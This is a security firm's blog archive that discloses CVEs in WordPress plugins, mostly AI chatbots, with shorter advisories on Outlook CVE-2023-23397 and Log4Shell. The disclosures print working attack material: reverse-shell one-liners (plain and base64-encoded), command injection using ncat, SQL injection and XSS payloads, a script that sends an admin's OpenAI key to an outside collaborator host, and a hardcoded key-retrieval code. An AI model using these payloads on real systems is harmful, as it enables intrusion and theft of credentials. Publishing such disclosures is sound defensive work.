Vulnerability Archives - Prism Infosec

WordPress AI Plugins: Tell me a secret

Posted on 8th October 2024 by Prism Infosec

In our previous blog ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/) a series of Issues were identified within AI related WordPress plugins:

CVE-2024-6451 – Admin + Remote-Code-Execution (RCE)

CVE-2024-6723 – Admin + SQL Injection (SQLi)

CVE-2024-6847 – Unauthenticated SQL Injection (SQLi)

CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS)

Today, we will be looking at further vulnerability types within these plugins that don’t provide us with the same adrenaline rush as popping a shell, but clearly show how AI plugins are being rushed through development without thorough consideration for secure coding practices. Prism Infosec were attributed the following CVEs

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS

All vulnerabilities mentioned above were submitted to WPScan, who effectively managed the steps required to resolve the issues with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26

‘The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key’

Within the plugin source code, namely the ‘wdgpt-api-requests.php’ file, an action was identified with a route of ‘/wp-json/wdgpt/v1/api-key’ that allowed unauthenticated requests to be sent to retrieve an encoded OpenAI Secret key that is configured within the plugin settings.

*Figure 1: wdgpt_retrieve_api_key identified in source code.*

Upon reviewing the ‘wdgpt_retrieve_api_key’ function, an interesting check was being performed on a ‘key’ parameter sent within the request whereby a comparison was being made on a (not so) secret code.

*Figure 2: Secret code exposed in source code alongside OpenAPI key decoding logic.*

In order for the request to be successful, a JSON value of {“key”:”U2FsdGVkX1+X”} needed to be sent within the POST request.

This secret key remained unchanged across all plugin installation and by combining the secret key with the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key‘, allowed for the retrieval of the ROT13 OpenAI secret key.

Decoding the ROT13 key with the following Bash script unveiled the in use OpenAI key.

#!/bin/bash 
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73

‘The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it’

Similar to the previous issue (but somehow worse), the OpenAI secret key was found to be disclosed to all users of the chatbot. The Authorization header contained the plaintext value of the API key set within the plugin configuration. This allowed an unauthenticated user to compromise the OpenAI secret key set in the application simply by sending a message through the chatbot.

Configuration of the OpenAI API key resided within the admin console located at the following URL:

/wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved

Once set, the chatbot functionality was available to unauthenticated users by default. By intercepting the request, it was identified that a client-side request was being sent directly to OpenAI, containing the secret key within the Authorization header.

Request:

POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: “Not/A)Brand”;v=”8″, “Chromium”;v=”126″
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{“temperature”:0.8,”top_p”:1,”max_tokens”:1500,”frequency_penalty”:0.01,”presence_penalty”:0.01,”model”:”gpt-3.5-turbo-16k”,”messages”:[{“role”:”system”,”content”:”Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. “},{“role”:”user”,”content”:”Hi there!”}]}

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664

‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ‘ays_chatgpt_disconnect’, ‘ays_chatgpt_connect’, and ‘ays_chatgpt_save_feedback’’

During source code analysis of the plugin, a ‘wp_ajax_nopriv’ function named ‘ays_chatgpt_admin_ajax’ was identified.

Figure 4: Unauthenticated admin endpoint identified in source code.

Upon further inspection of the function contained within the file ‘class-chatgpt-assistant-admin.php’, a ‘function’ parameter sent within the request was being checked to first confirm if a null value was present, before passing the value onto an ‘is_callable’ function, which is used to ‘Verify that a value can be called as a function from the current scope’.

This essentially allowed for any function within the scope of ‘class-chatgpt-assistant-admin.php’ to be called.

*Figure 5: Function parameter value passed to is_callable() to access specified function.*

The functions that could be accessed from an unauthenticated context included:

ays_chatgpt_disconnect

ays_chatgpt_connect

ays_chatgpt_save_feedback

By sending the following request from an unauthenticated context it was possible to ‘disconnect’ the current running configuration from OpenAI, essentially performing a Denial of Service for the chatbot functionality.

*Figure 6: Disconnecting the plugin configuration from OpenAI.*

*Figure 7: api_key setting updated to empty value.*

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d

‘The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)’

Testing of the plugin identified that the settings functionality of the plugin did not effectively sanitise inputs, and as such allowed malicious payloads such as JavaScript code to be accepted and executed within the chatbot instances for visiting users.

As seen in the screenshot below the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input within the settings page located at:

/wp-admin/options-general.php?page=chatbot-support-ai-settings

*Figure 8: XSS payload injected into chatbot starting message value.*

The result of this led to the JavaScript being executed within chatbot instances when users visit the application.

*Figure 9: XSS payload triggered on new instance of chatbot.*

It is accepted that this vulnerability required administrator privileges to successfully set up the exploit, however, as this issue impacted all visiting users, this would allow malicious scripts to be distributed through the plugin, which could lead to further attacks against other third-party services through the guise of the visiting users’ resources.

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.

WordPress Plugins: AI-dentifying Chatbot Weak Spots

Posted on 31st July 2024 by Prism Infosec

AI chatbots have become increasingly prevalent across various industries due to their ability to simulate human-like conversations and perform a range of tasks. This trend is evident in the WordPress ecosystem, where AI chatbot plugins are becoming widely adopted to enhance website functionality and user engagement.

Prism Infosec reviewed the security postures of several open-source WordPress AI Chatbot plugins and identified various issues exploitable from both a high-privilege and unauthenticated perspective.

This post highlights the discovery of four specific Common Vulnerabilities and Exposures (CVEs) within these plugins:

AI Engine (v2.4.3) – https://wordpress.org/plugins/ai-engine/
- CVE-2024-6451 – Admin + Remote-Code-Execution (RCE)
- CVE-2024-6723 – Admin + SQL Injection (SQLi)

SmartSearch WP (v2.4.2) – https://wordpress.org/plugins/smartsearchwp/
- CVE-2024-6847 – Unauthenticated SQL Injection (SQLi)
- CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS)

CVE-2024-6451 – AI Engine < 2.5.1 – Admin+ RCE

WPScan: https://wpscan.com/vulnerability/fc06d413-a227-470c-a5b7-cdab57aeab34/

“AI Engine < 2.5.1 is susceptible to remote-code-execution (RCE) via Log Poisoning. The plugin fails to validate the file extension of “logs_path”, allowing Administrators to change log filetypes from .log to .php.

Error messages can then be manipulated to contain arbitrary PHP with the intent to have this echoed in the log file and ultimately executed as legitimate code by the web server, leading to the potential for remote-code-execution.”

At the time of exploitation, the AI Engine version assessed was v2.4.3 – with 2.6m downloads and 70k active installations:

The attack unfolded by enabling Dev Tools via “Settings > Advanced > Enable Dev Tools”.

Within the “Dev Tools” Tab, the “Server Debug” option was enabled to allow for error logging – a pre-requisite for the earlier mentioned Log Poisoning attack.

As part of such attack, a malicious actor attempts to inject specially crafted payloads into log files that exploit vulnerabilities in the log processing or parsing mechanisms.

If these payloads are later executed by the system, webserver or unsafely interpreted by a vulnerable application, they may lead to RCE.

Whilst modifying plugin configurations, it was observed that “logs_path” was user-controllable and could be manipulated with an alternative extension (such as .php).

Navigating to the URL disclosed in “logs_path” presented an array of payloads what were echoed in the log during testing – however, these were benign as the .log extension rendered all payloads to be interpreted as plain text.

The error log extension was subsequently set as .php with the intent to cause the webserver to interpret any PHP payloads within the log as legitimate server-side code:

Request:
POST /wp-json/mwai/v1/settings/update HTTP/1.1
Host: 192.168.178.143
Content-Length: 17702
Pragma: no-cache
Cache-Control: no-cache
X-WP-Nonce: 54c6dd2c07
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://192.168.178.143
Referer: http://192.168.178.143/wp-admin/admin.php?page=mwai_settings&nekoTab=settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: keep-alive

{
  "options": {
    "embeddings_default_env": "lohkmfon",
    "ai_default_env": "zl9pvc1h",
    "module_suggestions": true,
    "module_chatbots": true,
    -- SNIP --
    },
    "public_api": true,
    "debug_mode": false,
    "server_debug_mode": true,
    "logs_path": "/opt/bitnami/wordpress/wp-content/uploads/webshell.php"
  }
}

Response:
HTTP/1.1 200 OK
Date: Tue, 18 Jun 2024 09:59:48 GMT

-- SNIP --

{
  "success": true,
  "message": "OK",
  "options": {
    "embeddings_default_env": "lohkmfon",
    -- SNIP –-
    "public_api": true,
    "debug_mode": false,
    "server_debug_mode": true,
    "logs_path": "/opt/bitnami/wordpress/wp-content/uploads/webshell.php",
    "intro_message": true
  }
}

Once the log file was modified to be served as PHP, the next step was to identify an entry field which fully reflected the attacker’s input within the log. In this case, “Organization ID” was found to be fit for purpose:

The payload could then be planted within the log by navigating to the chatbot and submitting a message – which in turn invoked an error:

This echoed the PHP payload within the Admin Logs panel as benign text:

However, the log file itself (which now served as a web shell) could be leveraged to execute system commands on the underlying server:

Once remote-code-execution was confirmed to be possible, the below payload was devised to instruct the remote server to establish a reverse shell connection with the attacker’s IP address and port number (in this case, 192.168.1.93 on port 80). This would effectively allow remote access into the target machine:

Reverse Shell:

sh -i >& /dev/tcp/192.168.1.93/80 0>&1

The above payload did not yield a reverse shell connection and was therefore revised to undergo “base64” decoding with the result piped into “bash“:

Reverse Shell (Base64 Encoded):

echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjkzLzgwIDA+JjE= | base64 -d | bash

As pictured below, a reverse-shell connection was successfully established and remote access into the system was achieved:

The finding was disclosed on WPScan and addressed in version 2.4.8, with further improvements made in version 2.5.1. Big thank you to plugin author Jordy Meow for swiftly fixing the raised vulnerabilities.

CVE-2024-6723 – AI Engine < 2.4.8 – Admin+ SQL Injection

Further testing of the AI Engine plugin had identified an SQL injection vulnerability within one of the admin functionalities. At the time of writing, WPScan has verified the issue and assigned a CVE ID – however, has not publicly released the finding.

As such, technical details have been omitted from this write-up, but it is understood that the issue was addressed in version 2.4.8:

Whilst it is acknowledged that the vulnerabilities affecting AI Engine required administrative access for successful exploitation and therefore the risks were slightly mitigated, the other assessed (and much less popular) AI chatbot plugin was found to be exploitable from a completely unauthenticated perspective.

CVE-2024-6847 – SmartSearch WP <= 2.4.4 – Unauthenticated SQLi

WPScan: https://wpscan.com/vulnerability/baa860bb-3b7d-438a-ad54-92bf8e21e851/

“The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users when submitting messages to the chatbot.”

At the time of exploitation, the SmartSearch WP version assessed was v2.4.2 – with less than 2k downloads and 10+ active installations (30+ at the time of writing):

Unauthenticated users had the ability to perform SQL injection attacks directly via the chatbot:

The below request was intercepted upon sending a message. Here, the SQL SLEEP() function was inserted into vulnerable parameter “unique_conversation”:

Request:
POST /wp-json/wdgpt/v1/retrieve-prompt HTTP/1.1
Host: 192.168.178.143
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://192.168.178.143
Referer: http://192.168.178.143/2024/06/17/hello-world/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: keep-alive

{
  "question": "Test",
  "conversation": [
    {
      "text": "Test",
      "role": "user",
      "date": "2024-06-21T12:16:42.179Z"
    }
  ],
  "unique_conversation": "mlg4w8is9cnlxonnq78' AND (SELECT 1 FROM (SELECT SLEEP(25))A) AND '1'='1"
}

A response was received after the amount of time specified in the payload (+3s for processing delay), thereby confirming the presence of a blind SQL injection vulnerability:

It was then possible to use “SQLMap” to automate the time-based process of exfiltrating the database:

The finding was disclosed on WPScan and addressed in version 2.4.5.

CVE-2024-6843 – SmartSearch WP <= 2.4.4 – Unauthenticated Stored XSS

WPScan: https://wpscan.com/vulnerability/9a5cb440-065a-445a-9a09-55bd5f782e85/

“The plugin does not sanitise and escape chatbot conversations, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks within the Admin ‘Chat Logs’ panel even when the unfiltered_html capability is disallowed (for example in multisite setup).”

During testing, the chatbot was observed to be susceptible to Self-XSS – a type of an injection attack whereby payloads cannot propagate to other users, and are typically executed only in application areas accessible to the person who submitted the payload.

Highlighted below, the payload “<img src=x onerror=alert(10)>” was submitted and immediately the JavaScript alert was executed:

Whilst the impact of self-XSS can be considered negligible, it was observed that the payloads were also successfully stored within the administrative “Chat Logs” area – potentially allowing an attacker to populate chatbot conversations with malicious payloads, to be later executed against a viewing administrator.

Once it was confirmed that JS execution on the admin panel was possible, the below payload was devised to steal the ChatGPT API key from “Settings” and forward it to an attacker-controlled domain:

API Key Hijack Payload:
fetch(‘http://192.168.178.143/wp-admin/admin.php?page=wdgpt’, {
    credentials: ‘include’
}).then(response => response.text()).then(text => new DOMParser().parseFromString(text, ‘text/html’)).then(doc => {
    const key = doc.querySelector(‘#wd_openai_api_key_field’).value;
    fetch(`https://jtgyf4on6gofakn7d59eq33rsiy9m0co1.oastify.com/stolen_gpt_key=${key}`);
});

The above payload was Base64 encoded and passed to eval() for execution:

API Key Hijack Payload (Base64 Encoded):
<script>eval(atob(‘ZmV0Y2goJ2h0dHA6Ly8xOTIuMTY4LjE3OC4xNDMvd3AtYWRtaW4vYWRtaW4ucGhwP3BhZ2U9d2RncHQnLCB7IGNyZWRlbnRpYWxzOiAnaW5jbHVkZScgfSkudGhlbihyZXNwb25zZSA9PiByZXNwb25zZS50ZXh0KCkpLnRoZW4odGV4dCA9PiBuZXcgRE9NUGFyc2VyKCkucGFyc2VGcm9tU3RyaW5nKHRleHQsICd0ZXh0L2h0bWwnKSkudGhlbihkb2MgPT4geyBjb25zdCBrZXkgPSBkb2MucXVlcnlTZWxlY3RvcignI3dkX29wZW5haV9hcGlfa2V5X2ZpZWxkJykudmFsdWU7IGZldGNoKGBodHRwczovL2p0Z3lmNG9uNmdvZmFrbjdkNTllcTMzcnNpeTltMGNvMS5vYXN0aWZ5LmNvbS9zdG9sZW5fZ3B0X2tleT0ke2tleX1gKTsgfSk7’))></script>

The constructed payload could then be submitted as a message, in the hope that an administrator would later view conversation logs and have the XSS payload executed within their web-browser, in the context of their user session:

As highlighted below, the payload was successfully executed against the viewing administrator and the ChatGPT API key was intercepted by the attacker-controlled server:

The finding was disclosed on WPScan and addressed in version 2.4.5. Prism Infosec would like to thank the WPScan team for seamlessly handling the disclosure process of all discussed vulnerabilities.

Get Tested

All Vulnerabilities were discovered and written by Karolis Narvilas of Prism Infosec.

WordPress Plugins: Don’t Let Vulnerabilities Crash Your Site’s Party

Posted on 15th April 2024 by Prism Infosec

Like many management systems, WordPress offers extensions to its core functionality that are created by the community and third-party providers. While these extensions are essential for the thriving WordPress ecosystem, the influx of new code introduces fresh vulnerabilities.

Prism Infosec assessed several open-source extensions and found a number of issues that could pose a risk to plugin user’s data and infrastructure. This post details the identification of 4 CVEs.

The following plugins were assessed.

Newsletters-lite (v4.9.2) [CVE-2023-4797] – https://en-gb.wordpress.org/plugins/newsletters-lite
Track the Click (v0.3.10) [CVE-2023-5108] – https://en-gb.wordpress.org/plugins/track-the-click
Easy Newsletter Signups (v1.0.4) [CVE-2023-5041] – https://en-gb.wordpress.org/plugins/easy-newsletter-signups
History Log by click5 (v1.0.11) [CVE-2023-5082] – https://wordpress.org/plugins/history-log-by-click5

CVE-2023-4797: Newsletters-Lite – Command Injection

WPScan: https://wpscan.com/vulnerability/de169fc7-f388-4abb-ab94-12522fd1ac92

A benefit of open-source software is the ability to look directly at the code when searching for security issues. This was one approach taken in the assessment of the plugins in this post.

Examining the code for the Newsletters-Lite extension revealed the potential for a command injection vulnerability on the email archiving functionality.

In the snippet above, the archiving function executed a command that was constructed by concatenating user-controlled strings into hard-coded command. This can be highly dangerous if input is not correctly sanitised or checked, as it may allow an attacker to alter the structure and content of the command in unintended ways.

The $query parameter above was taken from user input on the extension’s configuration screen.

The plugin assumed that the user would input a numerical value and no further validation was performed on the server-side. The below request was issued to set the value of “Archive Older Than” to contain an arbitrary shell command.

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688


-- REDACTED FOR BREVITY --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#

Backticks were used to ensure that the enclosed call to ncat was interpreted as a subcommand, rather than a part of the original call to mysql. This prevented the malicious input from causing undue syntax errors with the rest of the intended command that could prevent proper execution.

The call to ncat establishes a TCP connection to a host of the attacker’s choosing, upon which it executes the bash interpreter. This technique is called a Reverse Shell. It gives an attacker control over the server’s operating system as the user that the web server software is running under.

Navigating back to the configuration page revealed that the payload had been successfully saved to the database.

Now that the payload was in place, it needed to be executed in order to execute the maliciously constructed shell command and compromise the server. Whilst the archive function runs on a schedule (meaning an attacker could wait), there was an option to run the archive on demand – which allowed the immediate execution of the malicious payload.

When the HTTP request was sent to the server, the reverse shell was established.

The vulnerability was disclosed on WPScan and addressed in version 4.9.3.

CVE-2023-5108: Easy Newsletter Signups – SQL Injection

WPScan: https://wpscan.com/vulnerability/1b277929-e88b-4ab6-9190-526e75f5ce7a

As with command injection, unsafe concatenation of user input can lead to SQL injection vulnerabilities.

In the code below for the Easy Newsletter Signups export functionality, user input is concatenated directly into a SQL query. As in the previous example, this allowed an attacker control over the command to be executed by the underlying OS. In this case, it allows them control over the query executed within the database.

User input is taken directly from the $_GET global variable and concatenated into the query string. By intercepting the request for the export operation using BurpSuite, it was possible to inject valid arbitrary SQL via the nsl_id parameter.

GET /wp-admin/admin.php?export=Export+CSV&page=wpens-list&s=&_wpnonce=f59700b4db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpens-list&action=-1&paged=1&nsl_id%5B%5D=265%20UNION%20ALL%20SELECT%20NULL%2cNULL%2cNULL%2cNULL%2cNULL%2cCONCAT(schema_name)%2cNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-&action2=-1 HTTP/1.1

-- REDACTED FOR BREVITY --

The injected query attempts to combine schema information into the intended result set. The CSV data returned in the response contained the database schema requested in the malicious query.

HTTP/1.1 200 OK
Date: Fri, 01 Sep 2023 12:57:40 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Description: File Transfer
Content-Disposition: attachment; filename= wpens-subscribers-01-Sep-2023.csv
Expires: 0
Pragma: public
Connection: close
Content-Type: text/csv;charset=UTF-8
Content-Length: 162

First Name,Last Name,Email,User IP,Created Date
test,test,test18@prisminfosec.com,192.168.178.1,2023-09-01 12:41:18
,,,information_schema,
,,,bitnami_wordpress,

It was then possible to use SQLMap tool to automate the process of exfiltrating the database.

The vulnerability was disclosed on WPScan and no official fix has been released. WordPress has since stated that “This plugin has been closed as of 27 October 2023 and is not available for download. Reason: Security Issue”.

CVE-2023-5041: Track the Click – SQL Injection

WPScan: https://wpscan.com/vulnerability/45194442-6eea-4e07-85a5-4a1e2fde3523

The Track the Click extension was also found to concatenate user input into its statistics query, resulting in a SQL injection vulnerability.

The UI for the function employs a calendar date-picker to populate this parameter. As such, it is expected that the parameter must contain a date.

As no server-side validation was performed, it was possible to inject the SQL SLEEP() function into the affected parameter. A response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.

Exploiting blind SQL injection manually is incredibly arduous and time-consuming. However, tools such as SQLMap automate this process.

The vulnerability was disclosed on WPScan and addressed in version 0.3.12.

CVE-2023-5082: History Log by click5 – SQL Injection

WPScan: https://wpscan.com/vulnerability/13a196ba-49c7-4575-9a49-3ef9eb2348f3/

The History Log extension included a social photo feed from Smash Ballon. To facilitate this, it stored data about feed sources in its database. A delete query including the ID of a source was constructed using concatenated, user-controlled data – and was therefore injectable.

The UI itself does not provide an opportunity to influence the value of the source_id parameter. However, it was possible to inject SQL by altering the request using an intercepting proxy.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 481
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

-- REDACTED FOR BREVITY --

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"
xx
2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)

-- REDACTED FOR BREVITY –

Again, a response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.

The backend database contents were exfiltrated with SQLMap.

The vulnerability was disclosed on WPScan and addressed in version 1.0.13.

Prism Infosec would like to thank the WPScan team for seamlessly handling the disclosure process and hopes that the identified vulnerabilities emphasise the critical importance of proactive security measures in WordPress extensions. Regular security assessments, adherence to secure coding practices, and prompt patching of identified vulnerabilities are essential to mitigate risks and safeguard WordPress-powered websites against malicious exploitation.

All Vulnerabilities were discovered and written by Karolis Narvilas of Prism Infosec.

Microsoft Outlook Elevation of Privilege Vulnerability (CVE-2023-23397)

Posted on 16th March 2023 by Prism Infosec

Introduction to CVE-2023-23397

On 14^th of March, Microsoft released a security advisory, detailing CVE-2023-23397, a privilege escalation vulnerability, affecting various versions of Microsoft Outlook. The vulnerability has been assigned a CVSS:3.1 score of 9.8 (CRITICAL).

The vulnerability allows a remote, unauthenticated attacker to access a victim’s Net-NTLMv2 hash by sending a tailored email to a compromised system, then use the hash to authenticate the attacker.

According to the Microsoft Security Resource Center (MSRC), the vulnerability already been utilised by a “Russia-based threat actor” in targeted attacks against government, transport, energy, and military sectors in Europe.

Impact of CVE-2023-23397

The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client. This could lead to exploitation before the email is viewed in the Preview Pane.

Furthermore, multiple proof-of-concepts are now widely available. Given that this is a no-user-interaction exploit, the potential for harm is high.

Fixes for CVE-2023-23397

Microsoft has addressed the vulnerability on the 14^th of March as part of “Patch Tuesday”, and advises that the safest way to remediate the issue is to apply the security update for the affected products. For those users who are unable to update, the following workarounds are suggested:

Add users to the Protected Users Security Group, which prevents the use of NTLM as an authentication mechanism. Performing this mitigation makes troubleshooting easier than other methods of disabling NTLM. Consider using it for high value accounts such as Domain Admins when possible. Please note: This may cause impact to applications that require NTLM, however the settings will revert once the user is removed from the Protected Users Group. Please see Protected Users Security Group for more information.
Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.

Users are advised to apply this patch immediately to avoid potential exploitation of this vulnerability. In addition to applying the patch, users should also review their system configurations to ensure that proper security controls are in place, such as strong access controls and network segmentation. Additionally, organizations should consider implementing security testing and vulnerability scanning to identify and address vulnerabilities before they can be exploited.

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397

Apache ‘Log4Shell’ Log4j (version 2) vulnerability (CVE-2021-44228)

Posted on 13th December 2021 by Prism Infosec

Our teams are actively responding to the Log4Shell (or LogJam) 0-day threat which has been reported in the Apache Log4j 2 Java library and has been awarded a severity rating of 10 out of 10 by NIST. We are alerting customers to systems and services that may potentially be impacted and assisting with the investigation and remediation of any attacks that may result, in line with guidance from the National Cyber Security Centre.

What’s the problem?

The issue does not just impact services written wholly in Java; it simply requires a single java application leveraging the log4j library on the network. This makes it necessary to check all Java code across the network regardless of whether they are running Linux, Mac or Windows and to determine if these are using the Log4j library.

How does it work?

Vulnerability CVE-2021 -44228 allows unauthenticated remote code execution which is triggered by a string provided by the attacker through a variety of different input vectors which is parsed and processed by the Log4j (version 2) vulnerable component.

According to Microsoft, most of the activity to date has been mass scanning of systems. It states the string contains “jndi”, which refers to the Java Naming and Directory Interface followed by the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, which precedes the attacker’s domain. However, attackers have obfuscated these requests using additional characters making them harder to detect.

What should I do?

Customers are advised to patch their systems by updating all copies of Log4j to version 2.15.0 as soon as practicable.

NCSC advice states: “If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later

If you are using an affected third-party application, ensure you keep the product updated to the latest version. The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.”

For those unable to carry out the update immediately, Apache has suggested three workarounds as explained by Sophos here as follows:

Run your vulnerable program under Java with an added command line option to suppress JNDI lookups, like this: java -Dlog4j2.formatMsgNoLookups=true This sets a special system property that prevents any sort of {$jndi:...} activity from triggering a network connection, which prevents both exfiltration and remote code implantation.
Set an environment variable to force the same result: set LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Repackage your log4j-core-*.jar file by unzipping it, deleting the component called org/apache/logging/log4j/core/lookup/JndiLookup.class, and zipping the other files back up again

What’s the advice from vendors?

The NCSC recommends following vendor best practice advice in the mitigation of vulnerabilities. Firewall vendors have been quick to issue patches and advice including:

Microsoft365 Defender customers are advised to turn on cloud-delivered protection while users of Microsoft Defender for Endpoint should turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat: Block executable files from running unless they meet a prevalence, age, or trusted list criterion. The wide attack surface of exploited by the attack means teams are also advised to monitor for signs of post-exploitation such as coin mining, lateral movement, and Cobalt Strike.

Azure Firewall Premium customers have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021.

Sophos has published a list of affected products and published an extended detection and response tool to identify affected Linux servers

Fortigate has released intrusion prevetion system (IPS) rules to detect and block this specific vulnerability as has Juniper.

In the meantime, if you have any concerns, please do reach out to us at contact@prisminfosec.com or on 01242 652 100.